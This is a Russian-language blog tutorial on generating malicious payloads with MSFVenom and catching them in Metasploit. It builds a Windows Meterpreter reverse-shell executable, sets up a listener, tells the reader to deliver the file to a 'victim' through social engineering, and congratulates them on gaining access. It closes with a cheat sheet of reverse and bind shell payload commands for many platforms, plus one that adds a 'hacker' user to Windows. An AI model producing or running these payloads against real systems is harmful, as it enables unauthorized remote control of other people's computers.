Как использовать MSFVenom

msfvenom как использовать

В сегодняшней статье я покажу, как использовать MSFVenom. Вы узнаете, как создать полезную нагрузку (Payload) в MSFVenom. Также, приведу список всех команд MSFVenom.

Еще по теме: Как использовать фреймворк Metasploit

Что такое MSFVenom

MSFVenom — бесплатный инструмент для создания полезной нагрузки (вредоносного файла). Это, так сказать, двоюродный брат Metasploit. С его помощью вы можете создавать различные полезные нагрузки, шелл-код и обратный шелл.

В далеком 2015 году он заменил инструменты MSFPayload и MSFEncode.

Что такое MSFVenom

В новой версии MSFVenom появилась справка. Чтобы отобразить справку введите:

msfvenom -h

Msfvenom инструкция

Как использовать MSFVenom

Reverse TCP (обратное подключение, обратный шелл, пейлоад), — схема взаимодействия с целевым компьютером. Говоря простым языком. Мы создаем вредоносный файл (полезную нагрузку), после запуска которого целевой компьютер будет пытаться подключиться к нашему компьютеру. Это называется «бэкконнект» или в нашем случае обратный шелл, потому что «бэкконнект» — это понятие растяжимое.

Чтобы узнать, какие полезные нагрузки доступны введите команду:

msf5> msfvenom -l payloads

Список команд MSFVenom

Или так:

# msfvenom -l payloads

Список полезных нагрузок MSFVenom

Следующая команда создаст вредоносный исполняемый файл (обратный шелл), после запуска которого откроется сеанс Meterpreter.

  • LHOST — IP-адрес вашего компьютера (атакующего).
  • LPORT — порт вашего компьютера, который назначен серверу или программе.
  • P — сокращение от «payload», полезная нагрузка для выбранной платформы.
  • F — параметр, который задает тип файла, например, exe для Windows.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.13 LPORT=4444 -f exe -a x64 -o /home/infosecaddicts/infoecaddicts.exe

MSFVenom инструкция. Создание полезной нагрузки

Полезная нагрузка готова:

Создание вредоносного файла MSFVenom

Мы создали пэйлоад, теперь переходим к следующему этапу. Запускаем msfconsole и вводим команды:

msf> use exploit/multi/handler
msf> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf> set LHOST 192.168.1.13
msf> set LPORT 4444
msf> run

Необходимо ввести те же данные (IP-адрес и порт), которые были использованы при создании обратного шелла.

Этой операцией мы позволяем принять подключение от созданного нами ранее обратного шелла, который запустит жертва.

Msfvenom инструкция

После создания вредоносного файла необходимо отправить его жертве. Вы можете использовать методы социальной инженерии или любой другой способ доставки вредоносного файла.

После запуска созданного файла откроется сессия Meterpreter:

Сессия meterpreter

Поздравляю, вы получили доступ к компьютеру.

Команды MSFVenom

При использовании MSFVenom всегда должна быть под рукой шпаргалка по командам:

Meterpreter reverse shell x86 multi stage

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elfLinux

Linux Meterpreter bind shell x86 multi stage

msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf

Linux bind shell x64 single stage

msfvenom -p linux/x64/shell_bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf

Linux reverse shell x64 single stage

msfvenom -p linux/x64/shell_reverse_tcp RHOST=IP LPORT=PORT -f elf > shell.elf

Windows Meterpreter reverse shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe

Windows Meterpreter bind shell

msfvenom -p windows/meterpreter/bind_tcp RHOST= IP LPORT=PORT -f exe > shell.exe

Windows CMD Multi Stage

msfvenom -p windows/shell/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe

Windows CMD Single Stage

msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe

Windows add user

msfvenom -p windows/adduser USER=hacker PASS=password -f exe > useradd.exe

Mac Reverse Shell

msfvenom -p osx/x86/shell_reverse_tcp LHOST=IP LPORT=PORT -f macho > shell.macho

Mac Bind shell

msfvenom -p osx/x86/shell_bind_tcp RHOST=IP LPORT=PORT -f macho > shell.macho

Python Shell

msfvenom -p cmd/unix/reverse_python LHOST=IP LPORT=PORT -f raw > shell.py

BASH Shell

msfvenom -p cmd/unix/reverse_bash LHOST=IP LPORT=PORT -f raw > shell.sh

PERL Shell

msfvenom -p cmd/unix/reverse_perl LHOST=IP LPORT=PORT -f raw > shell.pl

ASP Meterpreter shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f asp > shell.asp

JSP Shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=IP LPORT=PORT -f raw > shell.jsp

WAR Shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=IP LPORT=PORT -f war > shell.war

PHP Reverse Shell

msfvenom -p php/reverse_php LHOST=IP LPORT=PORT -f raw > phpreverseshell.php

Мы создали полезную нагрузку для Windows, но мы можем создать пейлоад для любой другой операционной системы, например: Android, iOS, Liniux и т. д. Все это позволяет сделать MSFVenom.

На этом все. Теперь вы знаете, как использовать MSFVenom.

Еще по теме: Анонимность в Kali Linux с помощью Tor и Proxychains

ВКонтакте
OK
Telegram
WhatsApp
Viber

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *